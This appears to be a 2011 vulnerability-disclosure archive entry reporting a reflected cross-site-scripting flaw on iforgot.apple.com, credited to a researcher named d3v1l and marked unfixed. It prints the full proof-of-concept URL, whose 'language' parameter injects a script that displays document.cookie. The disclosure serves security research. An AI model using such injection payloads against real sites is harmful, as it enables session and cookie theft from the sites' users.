Security researcher d3v1l, has submitted on 17/07/2011 a cross-site-scripting (XSS) vulnerability affecting iforgot.apple.com, which at the time of submission ranked 37 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/07/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 17/07/2011 |
Date published: 21/07/2011 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: d3v1l |
Domain: iforgot.apple.com |
Category: XSS |
Pagerank: 37 |
|---|
URL: https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/wa/authenticate?authenticationKey=aaaaaaa
aaaaaaaaaaaaaaaaaaaa&language='"--></style></script><script>alert(document.cookie)</script> |
|
Click here to view the mirror
|
|
|
| 
